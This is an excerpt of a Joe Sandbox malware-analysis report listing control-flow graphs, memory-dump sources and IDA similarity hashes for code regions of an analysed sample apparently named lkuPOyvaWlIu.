                                                            control_flow_graph 898 56e5362-56e536a 899 56e536c-56e5370 898->899 900 56e5371-56e5376 898->900 899->900 901 56e537d-56e5380 900->901 902 56e5378-56e537a 900->902 904 56e5381-56e53a0 901->904 903 56e537c 902->903 902->904 903->901 905 56e53a7-56e5484 call 56e41a0 call 56e3cc0 904->905 906 56e53a2 904->906 916 56e548b-56e54a9 905->916 917 56e5486 905->917 906->905 947 56e54ac call 56e5658 916->947 948 56e54ac call 56e5649 916->948 917->916 918 56e54b2-56e54bd 919 56e54bf 918->919 920 56e54c4-56e54c8 918->920 919->920 921 56e54cd-56e54d4 920->921 922 56e54ca-56e54cb 920->922 924 56e54db-56e54e9 921->924 925 56e54d6 921->925 923 56e54ec-56e5530 922->923 929 56e5596-56e55ad 923->929 924->923 925->924 931 56e55af-56e55d4 929->931 932 56e5532-56e5548 929->932 938 56e55ec 931->938 939 56e55d6-56e55eb 931->939 936 56e554a-56e5556 932->936 937 56e5572 932->937 940 56e5558-56e555e 936->940 941 56e5560-56e5566 936->941 942 56e5578-56e5595 937->942 939->938 943 56e5570 940->943 941->943 942->929 943->942 947->918 948->918
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                            • API String ID: 0-1487592376
                                                            • Opcode ID: 73f37819006201135e6acf07bf894d6613017c9370a59e4062e5301852f3bd54
                                                            • Instruction ID: 99c874647f31fc12f6f9947952832cae1ad59b20f7604f486e8343cee7a79127
                                                            • Opcode Fuzzy Hash: 73f37819006201135e6acf07bf894d6613017c9370a59e4062e5301852f3bd54
                                                            • Instruction Fuzzy Hash: 3E91C674E05218CFDB14CFA9D984A9DBBF2BF89304F14C06AE809AB365DB749985CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 949 56eccd8-56eccda 950 56eccdc-56eccde 949->950 951 56ecce1-56ecce4 949->951 952 56ecce5-56ecd08 950->952 953 56ecce0 950->953 951->952 954 56ecd0f-56ecdec call 56e41a0 call 56e3cc0 952->954 955 56ecd0a 952->955 953->951 965 56ecdee 954->965 966 56ecdf3-56ece14 call 56e5658 954->966 955->954 965->966 968 56ece19-56ece24 966->968 969 56ece2b-56ece2f 968->969 970 56ece26 968->970 971 56ece34-56ece3b 969->971 972 56ece31-56ece32 969->972 970->969 974 56ece3d 971->974 975 56ece42-56ece50 971->975 973 56ece53-56ece97 972->973 979 56ecefd-56ecf14 973->979 974->975 975->973 981 56ece99-56eceaf 979->981 982 56ecf16-56ecf3b 979->982 986 56eced9 981->986 987 56eceb1-56ecebd 981->987 989 56ecf3d-56ecf52 982->989 990 56ecf53 982->990 988 56ecedf-56ecefc 986->988 991 56ecebf-56ecec5 987->991 992 56ecec7-56ececd 987->992 988->979 989->990 993 56eced7 991->993 992->993 993->988
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                            • API String ID: 0-1487592376
                                                            • Opcode ID: 704d9c2e925e0046bd9e835e6747a0115a002851dd4064792717cb7d6c85411b
                                                            • Instruction ID: a3b52ccbaec13f049b811380383d1984c934482129b276263a81cdd1843f11a0
                                                            • Opcode Fuzzy Hash: 704d9c2e925e0046bd9e835e6747a0115a002851dd4064792717cb7d6c85411b
                                                            • Instruction Fuzzy Hash: E881A474E412189FEB14CFAAD944A9DBBF2BF89300F14C069E419AB365DB309985CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1045 56ed278-56ed27a 1046 56ed27c-56ed280 1045->1046 1047 56ed281-56ed2a8 1045->1047 1046->1047 1048 56ed2af-56ed38c call 56e41a0 call 56e3cc0 1047->1048 1049 56ed2aa 1047->1049 1059 56ed38e 1048->1059 1060 56ed393-56ed3b4 call 56e5658 1048->1060 1049->1048 1059->1060 1062 56ed3b9-56ed3c4 1060->1062 1063 56ed3cb-56ed3cf 1062->1063 1064 56ed3c6 1062->1064 1065 56ed3d4-56ed3db 1063->1065 1066 56ed3d1-56ed3d2 1063->1066 1064->1063 1068 56ed3dd 1065->1068 1069 56ed3e2-56ed3f0 1065->1069 1067 56ed3f3-56ed437 1066->1067 1073 56ed49d-56ed4b4 1067->1073 1068->1069 1069->1067 1075 56ed439-56ed44f 1073->1075 1076 56ed4b6-56ed4db 1073->1076 1080 56ed479 1075->1080 1081 56ed451-56ed45d 1075->1081 1083 56ed4dd-56ed4f2 1076->1083 1084 56ed4f3 1076->1084 1082 56ed47f-56ed49c 1080->1082 1085 56ed45f-56ed465 1081->1085 1086 56ed467-56ed46d 1081->1086 1082->1073 1083->1084 1087 56ed477 1085->1087 1086->1087 1087->1082
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                            • API String ID: 0-1487592376
                                                            • Opcode ID: 33e9a6d9b3de3c386e5255d18e16ad883ef64b171930390fc5be1c2a41f39751
                                                            • Instruction ID: 35175f4088c58a9403d17bd1c01d10368b77388e16ee2979d01c4166ec1751f5
                                                            • Opcode Fuzzy Hash: 33e9a6d9b3de3c386e5255d18e16ad883ef64b171930390fc5be1c2a41f39751
                                                            • Instruction Fuzzy Hash: 1D81B674E01218CFDB14DFAAD944A9DBBF2BF89300F14C069E819AB365DB349985CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 997 56eca08-56eca0a 998 56eca0c-56eca0e 997->998 999 56eca11 997->999 1000 56eca15-56eca38 998->1000 1001 56eca10 998->1001 999->1000 1002 56eca3f-56ecb1c call 56e41a0 call 56e3cc0 1000->1002 1003 56eca3a 1000->1003 1001->999 1013 56ecb1e 1002->1013 1014 56ecb23-56ecb44 call 56e5658 1002->1014 1003->1002 1013->1014 1016 56ecb49-56ecb54 1014->1016 1017 56ecb5b-56ecb5f 1016->1017 1018 56ecb56 1016->1018 1019 56ecb64-56ecb6b 1017->1019 1020 56ecb61-56ecb62 1017->1020 1018->1017 1022 56ecb6d 1019->1022 1023 56ecb72-56ecb80 1019->1023 1021 56ecb83-56ecbc7 1020->1021 1027 56ecc2d-56ecc44 1021->1027 1022->1023 1023->1021 1029 56ecbc9-56ecbdf 1027->1029 1030 56ecc46-56ecc6b 1027->1030 1034 56ecc09 1029->1034 1035 56ecbe1-56ecbed 1029->1035 1036 56ecc6d-56ecc82 1030->1036 1037 56ecc83 1030->1037 1040 56ecc0f-56ecc2c 1034->1040 1038 56ecbef-56ecbf5 1035->1038 1039 56ecbf7-56ecbfd 1035->1039 1036->1037 1041 56ecc07 1038->1041 1039->1041 1040->1027 1041->1040
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                            • API String ID: 0-1487592376
                                                            • Opcode ID: 51bba6c007684675d9ba0c8a07ff43ac910d25a555ee05c45fa44aa128fd5556
                                                            • Instruction ID: e9976b8184fccdb219d3016008bca88d6e21b3cdc226c8f228711a4fd80279e8
                                                            • Opcode Fuzzy Hash: 51bba6c007684675d9ba0c8a07ff43ac910d25a555ee05c45fa44aa128fd5556
                                                            • Instruction Fuzzy Hash: 8D819474E01218CFEB54DFAAD944A9DBBF2BF89300F14C069E819AB365DB349985CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1091 56ec738-56ec768 1092 56ec76f-56ec84c call 56e41a0 call 56e3cc0 1091->1092 1093 56ec76a 1091->1093 1103 56ec84e 1092->1103 1104 56ec853-56ec874 call 56e5658 1092->1104 1093->1092 1103->1104 1106 56ec879-56ec884 1104->1106 1107 56ec88b-56ec88f 1106->1107 1108 56ec886 1106->1108 1109 56ec894-56ec89b 1107->1109 1110 56ec891-56ec892 1107->1110 1108->1107 1112 56ec89d 1109->1112 1113 56ec8a2-56ec8b0 1109->1113 1111 56ec8b3-56ec8f7 1110->1111 1117 56ec95d-56ec974 1111->1117 1112->1113 1113->1111 1119 56ec8f9-56ec90f 1117->1119 1120 56ec976-56ec99b 1117->1120 1124 56ec939 1119->1124 1125 56ec911-56ec91d 1119->1125 1127 56ec99d-56ec9b2 1120->1127 1128 56ec9b3 1120->1128 1126 56ec93f-56ec95c 1124->1126 1129 56ec91f-56ec925 1125->1129 1130 56ec927-56ec92d 1125->1130 1126->1117 1127->1128 1131 56ec937 1129->1131 1130->1131 1131->1126
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                            • API String ID: 0-1487592376
                                                            • Opcode ID: 545dab09a71c5504257aa7335e37643feb9960cfc1d811a0bc86924937baf7d0
                                                            • Instruction ID: 9ebae17f2fca6bb9bee0606b1c2dad70a9a7e42391755e4dfae7989b479b5fab
                                                            • Opcode Fuzzy Hash: 545dab09a71c5504257aa7335e37643feb9960cfc1d811a0bc86924937baf7d0
                                                            • Instruction Fuzzy Hash: B181B574E01218DFEB54DFAAD944A9DBBF2BF88300F14C069E819AB365DB349945CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1135 56ecfab-56ecfd8 1136 56ecfdf-56ed0bc call 56e41a0 call 56e3cc0 1135->1136 1137 56ecfda 1135->1137 1147 56ed0be 1136->1147 1148 56ed0c3-56ed0e4 call 56e5658 1136->1148 1137->1136 1147->1148 1150 56ed0e9-56ed0f4 1148->1150 1151 56ed0fb-56ed0ff 1150->1151 1152 56ed0f6 1150->1152 1153 56ed104-56ed10b 1151->1153 1154 56ed101-56ed102 1151->1154 1152->1151 1156 56ed10d 1153->1156 1157 56ed112-56ed120 1153->1157 1155 56ed123-56ed167 1154->1155 1161 56ed1cd-56ed1e4 1155->1161 1156->1157 1157->1155 1163 56ed169-56ed17f 1161->1163 1164 56ed1e6-56ed20b 1161->1164 1168 56ed1a9 1163->1168 1169 56ed181-56ed18d 1163->1169 1170 56ed20d-56ed222 1164->1170 1171 56ed223 1164->1171 1174 56ed1af-56ed1cc 1168->1174 1172 56ed18f-56ed195 1169->1172 1173 56ed197-56ed19d 1169->1173 1170->1171 1175 56ed1a7 1172->1175 1173->1175 1174->1161 1175->1174
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                            • API String ID: 0-1487592376
                                                            • Opcode ID: 0b8db554941b287b8d104af44bb66554db165af44a90158e39f326d6b1e46d34
                                                            • Instruction ID: 04e19e711bb8c866637e0beddd9b3bea1027f1746137f0db33cc69d4322245e9
                                                            • Opcode Fuzzy Hash: 0b8db554941b287b8d104af44bb66554db165af44a90158e39f326d6b1e46d34
                                                            • Instruction Fuzzy Hash: 7E81B574E01218CFDB54DFAAD984A9DBBF2BF89300F14C069E819AB365DB349985CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1179 56e29ec-56e29f6 1181 56e29f8-56e2a3b 1179->1181 1182 56e2981-56e2999 1179->1182 1188 56e2a5d-56e2aac 1181->1188 1189 56e2a3d-56e2a5c 1181->1189 1185 56e29a0-56e29c8 1182->1185 1193 56e2aae-56e2ab5 1188->1193 1194 56e2ac7-56e2acf 1188->1194 1195 56e2abe-56e2ac5 1193->1195 1196 56e2ab7-56e2abc 1193->1196 1197 56e2ad2-56e2ae6 1194->1197 1195->1197 1196->1197 1200 56e2afc-56e2b04 1197->1200 1201 56e2ae8-56e2aef 1197->1201 1204 56e2b06-56e2b0a 1200->1204 1202 56e2af5-56e2afa 1201->1202 1203 56e2af1-56e2af3 1201->1203 1202->1204 1203->1204 1206 56e2b0c-56e2b21 1204->1206 1207 56e2b6a-56e2b6d 1204->1207 1206->1207 1215 56e2b23-56e2b26 1206->1215 1208 56e2b6f-56e2b84 1207->1208 1209 56e2bb5-56e2bbb 1207->1209 1208->1209 1219 56e2b86-56e2b8a 1208->1219 1210 56e36b6 1209->1210 1211 56e2bc1-56e2bc3 1209->1211 1216 56e36bb-56e36f0 1210->1216 1211->1210 1213 56e2bc9-56e2bce 1211->1213 1217 56e3664-56e3668 1213->1217 1218 56e2bd4 1213->1218 1220 56e2b28-56e2b2a 1215->1220 1221 56e2b45-56e2b63 call 56e02c8 1215->1221 1237 56e371f-56e372c 1216->1237 1238 56e36f2-56e3700 1216->1238 1223 56e366f-56e36b5 1217->1223 1224 56e366a-56e366d 1217->1224 1218->1217 1225 56e2b8c-56e2b90 1219->1225 1226 56e2b92-56e2bb0 call 56e02c8 1219->1226 1220->1221 1227 56e2b2c-56e2b2f 1220->1227 1221->1207 1224->1216 1224->1223 1225->1209 1225->1226 1226->1209 1227->1207 1231 56e2b31-56e2b43 1227->1231 1231->1207 1231->1221 1241 56e372e-56e3874 1237->1241 1238->1241 1242 56e3702-56e371b 1238->1242 1243 56e38a6-56e38bc 1241->1243 1244 56e3876-56e3881 1241->1244 1242->1237 1246 56e38ee-56e38f4 1243->1246 1247 56e38be-56e38c4 1243->1247 1244->1243 1249 56e38f6-56e390c 1246->1249 1251 56e3928-56e393d 1246->1251 1247->1249 1250 56e38c6-56e38d1 1247->1250 1252 56e393e-56e3969 1249->1252 1253 56e390e-56e3919 1249->1253 1250->1246 1251->1252 1253->1251
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                                            • API String ID: 0-2732225958
                                                            • Opcode ID: db1a2da0ba7d2924cb4400e64c1d090648f42eba8d0dd1e5be3c840cb8774b73
                                                            • Instruction ID: e09fcdc6bd28bc384b9f25240dc40206b6837f69e3523b94eb7c804e3a96025e
                                                            • Opcode Fuzzy Hash: db1a2da0ba7d2924cb4400e64c1d090648f42eba8d0dd1e5be3c840cb8774b73
                                                            • Instruction Fuzzy Hash: 15D1253AA2724847CB259F38CB9275ABF76FB55600F588914C60597321DF20F78AE741

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1254 56e7118-56e713b 1255 56e713d-56e7143 1254->1255 1256 56e7146-56e7166 1254->1256 1255->1256 1259 56e716d-56e7174 1256->1259 1260 56e7168 1256->1260 1262 56e7176-56e7181 1259->1262 1261 56e74fc-56e7505 1260->1261 1263 56e750d-56e7519 1262->1263 1264 56e7187-56e719a 1262->1264 1269 56e751b 1263->1269 1270 56e7589-56e75eb 1263->1270 1267 56e719c-56e71aa 1264->1267 1268 56e71b0-56e71cb 1264->1268 1267->1268 1276 56e7484-56e748b 1267->1276 1274 56e71ef-56e71f2 1268->1274 1275 56e71cd-56e71d3 1268->1275 1269->1270 1280 56e734c-56e7352 1274->1280 1281 56e71f8-56e71fb 1274->1281 1277 56e71dc-56e71df 1275->1277 1278 56e71d5 1275->1278 1276->1261 1279 56e748d-56e748f 1276->1279 1283 56e7212-56e7218 1277->1283 1284 56e71e1-56e71e4 1277->1284 1278->1277 1278->1280 1282 56e743e-56e7441 1278->1282 1278->1283 1285 56e749e-56e74a4 1279->1285 1286 56e7491-56e7496 1279->1286 1280->1282 1287 56e7358-56e735d 1280->1287 1281->1280 1288 56e7201-56e7207 1281->1288 1293 56e7508 1282->1293 1294 56e7447-56e744d 1282->1294 1295 56e721e-56e7220 1283->1295 1296 56e721a-56e721c 1283->1296 1289 56e727e-56e7284 1284->1289 1290 56e71ea 1284->1290 1285->1263 1291 56e74a6-56e74ab 1285->1291 1286->1285 1287->1282 1288->1280 1292 56e720d 1288->1292 1289->1282 1299 56e728a-56e7290 1289->1299 1290->1282 1297 56e74ad-56e74b2 1291->1297 1298 56e74f0-56e74f3 1291->1298 1292->1282 1293->1263 1300 56e744f-56e7457 1294->1300 1301 56e7472-56e7476 1294->1301 1302 56e722a-56e7233 1295->1302 1296->1302 1297->1293 1305 56e74b4 1297->1305 1298->1293 1304 56e74f5-56e74fa 1298->1304 1306 56e7296-56e7298 1299->1306 1307 56e7292-56e7294 1299->1307 1300->1263 1308 56e745d-56e746c 1300->1308 1301->1276 1303 56e7478-56e747e 1301->1303 1309 56e7246-56e726e 1302->1309 1310 56e7235-56e7240 1302->1310 1303->1262 1303->1276 1304->1261 1304->1279 1311 56e74bb-56e74c0 1305->1311 1312 56e72a2-56e72b9 1306->1312 1307->1312 1308->1268 1308->1301 1330 56e7274-56e7279 1309->1330 1331 56e7362-56e7398 1309->1331 1310->1282 1310->1309 1315 56e74e2-56e74e4 1311->1315 1316 56e74c2-56e74c4 1311->1316 1323 56e72bb-56e72d4 1312->1323 1324 56e72e4-56e730b 1312->1324 1315->1293 1319 56e74e6-56e74e9 1315->1319 1320 56e74c6-56e74cb 1316->1320 1321 56e74d3-56e74d9 1316->1321 1319->1298 1320->1321 1321->1263 1322 56e74db-56e74e0 1321->1322 1322->1315 1326 56e74b6-56e74b9 1322->1326 1323->1331 1334 56e72da-56e72df 1323->1334 1324->1293 1336 56e7311-56e7314 1324->1336 1326->1293 1326->1311 1330->1331 1337 56e739a-56e739e 1331->1337 1338 56e73a5-56e73ad 1331->1338 1334->1331 1336->1293 1339 56e731a-56e7343 1336->1339 1340 56e73bd-56e73c1 1337->1340 1341 56e73a0-56e73a3 1337->1341 1338->1293 1342 56e73b3-56e73b8 1338->1342 1339->1331 1354 56e7345-56e734a 1339->1354 1343 56e73c3-56e73c9 1340->1343 1344 56e73e0-56e73e4 1340->1344 1341->1338 1341->1340 1342->1282 1343->1344 1346 56e73cb-56e73d3 1343->1346 1347 56e73ee-56e740d call 56e76f1 1344->1347 1348 56e73e6-56e73ec 1344->1348 1346->1293 1349 56e73d9-56e73de 1346->1349 1351 56e7413-56e7417 1347->1351 1348->1347 1348->1351 1349->1282 1351->1282 1352 56e7419-56e7435 1351->1352 1352->1282 1354->1331
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o^q$(o^q$,bq$,bq
                                                            • API String ID: 0-879173519
                                                            • Opcode ID: 68cd0f2f1c833a6670d1efab29ec97284bed372d07e7cddd584cf69f34a18e44
                                                            • Instruction ID: a40c52906e41a65ec67e324e6e7bba3332f059a3085e61d3e2300837e38bf3e4
                                                            • Opcode Fuzzy Hash: 68cd0f2f1c833a6670d1efab29ec97284bed372d07e7cddd584cf69f34a18e44
                                                            • Instruction Fuzzy Hash: E7D11B70A02159DFCB15CFA9D884AADBBB2FF88304F558165E815AB764DB30ED42CF90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o^q$4'^q
                                                            • API String ID: 0-273632683
                                                            • Opcode ID: 5a2a89501b5d2607b0453d9043bff8bc3cf22e6d52ec900fe04483ee343d5cbd
                                                            • Instruction ID: 6c1a3acd84c3b9524497487fcc38333d54d0638581aa27855f3d117f59a0da4f
                                                            • Opcode Fuzzy Hash: 5a2a89501b5d2607b0453d9043bff8bc3cf22e6d52ec900fe04483ee343d5cbd
                                                            • Instruction Fuzzy Hash: C4825E75A02209DFCB15CFA8C588AAEBBF2FF88310F158559E4059B3A5DB31ED81CB51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o^q$Hbq
                                                            • API String ID: 0-662517225
                                                            • Opcode ID: 2a9598bcd78239c6326d2e52e70efc86aa6ae7bf29df8fb978b7d90905c67f4c
                                                            • Instruction ID: d8673d7135944fd610f4856f0a2841bb20db42e34660fec343a86de51311587d
                                                            • Opcode Fuzzy Hash: 2a9598bcd78239c6326d2e52e70efc86aa6ae7bf29df8fb978b7d90905c67f4c
                                                            • Instruction Fuzzy Hash: B1125D70A012199FCB15DF69D854AAEBBF6FF98300F248569E809DB391DF309D42CB91
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4139419804.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_6f20000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e85041efc610157da07dc3cf156e233aa72b7ee026887088563d7158f545c8eb
                                                            • Instruction ID: 82837445fef25f029077041497b9bd2c808982c3090d3ccfd757df8091d9db91
                                                            • Opcode Fuzzy Hash: e85041efc610157da07dc3cf156e233aa72b7ee026887088563d7158f545c8eb
                                                            • Instruction Fuzzy Hash: 1CF10474E01229CFDB54DFA9D884B9DBBB2BF88304F14C1A9E808AB355DB709985CF50
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 110329ffc66d66f59c8c994b77438874381dc119fcbabac038d05bed4d6d1d5f
                                                            • Instruction ID: 9bf34f1e19c934b1f8c86166a1fc82e7c3589b85358bff80f8eb29cbbb271ed0
                                                            • Opcode Fuzzy Hash: 110329ffc66d66f59c8c994b77438874381dc119fcbabac038d05bed4d6d1d5f
                                                            • Instruction Fuzzy Hash: 2051B674E01208DFDB18DFAAD584A9DBBB6FF89300F24C02AE815AB364DB359945CF14
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2661f95f7fc10320cfdc2eb7feed3ef9d427e678489774f784fc9a64fc91b3a0
                                                            • Instruction ID: 773a479318c1d558d5ea96428da578fec25fd06f5c292e24359310cbb975901a
                                                            • Opcode Fuzzy Hash: 2661f95f7fc10320cfdc2eb7feed3ef9d427e678489774f784fc9a64fc91b3a0
                                                            • Instruction Fuzzy Hash: 2251B374E01208DFDB18DFAAD584A9DBBB6FF88300F208429E819AB364DB319945CF14

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 527 56e76f1-56e76f2 528 56e76f9-56e76fa 527->528 529 56e76f4-56e76f8 527->529 530 56e76fc-56e76fd 528->530 531 56e7701-56e7725 528->531 529->528 530->531 532 56e772b-56e774e 531->532 533 56e7b54-56e7b58 531->533 542 56e77fc-56e7800 532->542 543 56e7754-56e7761 532->543 534 56e7b5a-56e7b6e 533->534 535 56e7b71-56e7b7f 533->535 540 56e7bf0-56e7c05 535->540 541 56e7b81-56e7b96 535->541 548 56e7c0c-56e7c19 540->548 549 56e7c07-56e7c0a 540->549 550 56e7b9d-56e7baa 541->550 551 56e7b98-56e7b9b 541->551 546 56e7848-56e7851 542->546 547 56e7802-56e7810 542->547 559 56e7763-56e776e 543->559 560 56e7770 543->560 552 56e7c67 546->552 553 56e7857-56e7861 546->553 547->546 567 56e7812-56e782d 547->567 555 56e7c1b-56e7c56 548->555 549->555 556 56e7bac-56e7bed 550->556 551->556 561 56e7c6c-56e7c7a 552->561 553->533 557 56e7867-56e7870 553->557 612 56e7c5d-56e7c64 555->612 565 56e787f-56e788b 557->565 566 56e7872-56e7877 557->566 562 56e7772-56e7774 559->562 560->562 577 56e7c7c-56e7c80 561->577 578 56e7c81-56e7c82 561->578 562->542 569 56e777a-56e77dc 562->569 565->561 572 56e7891-56e7897 565->572 566->565 592 56e782f-56e7839 567->592 593 56e783b 567->593 621 56e77de 569->621 622 56e77e2-56e77f9 569->622 574 56e7b3e-56e7b42 572->574 575 56e789d-56e78ad 572->575 574->552 580 56e7b48-56e7b4e 574->580 590 56e78af-56e78bf 575->590 591 56e78c1-56e78c3 575->591 577->578 583 56e7c89-56e7c9c 578->583 584 56e7c83-56e7c85 578->584 580->533 580->557 602 56e7c9e-56e7cb4 583->602 603 56e7cb5-56e7cbc 583->603 594 56e78c6-56e78cc 590->594 591->594 595 56e783d-56e783f 592->595 593->595 594->574 599 56e78d2-56e78e1 594->599 595->546 600 56e7841 595->600 606 56e798f-56e79ba call 56e7538 * 2 599->606 607 56e78e7 599->607 600->546 625 56e7aa4-56e7abe 606->625 626 56e79c0-56e79c4 606->626 609 56e78ea-56e78fb 607->609 609->561 614 56e7901-56e7913 609->614 614->561 616 56e7919-56e7931 614->616 679 56e7933 call 56e80d8 616->679 680 56e7933 call 56e80c9 616->680 620 56e7939-56e7949 620->574 624 56e794f-56e7952 620->624 621->622 622->542 627 56e795c-56e795f 624->627 628 56e7954-56e795a 624->628 625->533 648 56e7ac4-56e7ac8 625->648 626->574 630 56e79ca-56e79ce 626->630 627->552 631 56e7965-56e7968 627->631 628->627 628->631 633 56e79f6-56e79fc 630->633 634 56e79d0-56e79dd 630->634 635 56e796a-56e796e 631->635 636 56e7970-56e7973 631->636 638 56e79fe-56e7a02 633->638 639 56e7a37-56e7a3d 633->639 651 56e79df-56e79ea 634->651 652 56e79ec 634->652 635->636 637 56e7979-56e797d 635->637 636->552 636->637 637->552 640 56e7983-56e7989 637->640 638->639 641 56e7a04-56e7a0d 638->641 642 56e7a3f-56e7a43 639->642 643 56e7a49-56e7a4f 639->643 640->606 640->609 646 56e7a0f-56e7a14 641->646 647 56e7a1c-56e7a32 641->647 642->612 642->643 649 56e7a5b-56e7a5d 643->649 650 56e7a51-56e7a55 643->650 646->647 647->574 656 56e7aca-56e7ad4 call 56e63e0 648->656 657 56e7b04-56e7b08 648->657 653 56e7a5f-56e7a68 649->653 654 56e7a92-56e7a94 649->654 650->574 650->649 655 56e79ee-56e79f0 651->655 652->655 659 56e7a6a-56e7a6f 653->659 660 56e7a77-56e7a8d 653->660 654->574 661 56e7a9a-56e7aa1 654->661 655->574 655->633 656->657 667 56e7ad6-56e7aeb 656->667 657->612 663 56e7b0e-56e7b12 657->663 659->660 660->574 663->612 666 56e7b18-56e7b25 663->666 670 56e7b27-56e7b32 666->670 671 56e7b34 666->671 667->657 676 56e7aed-56e7b02 667->676 673 56e7b36-56e7b38 670->673 671->673 673->574 673->612 676->533 676->657 679->620 680->620
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                            • API String ID: 0-1932283790
                                                            • Opcode ID: c540f65aae93274e3c5d7f6668f36c31bef7bc2ef79646675df4cc0aca1edbc0
                                                            • Instruction ID: 1817b505023d564acf28e64363eec95725f7b9e9eb5a91639822d16e4070dfae
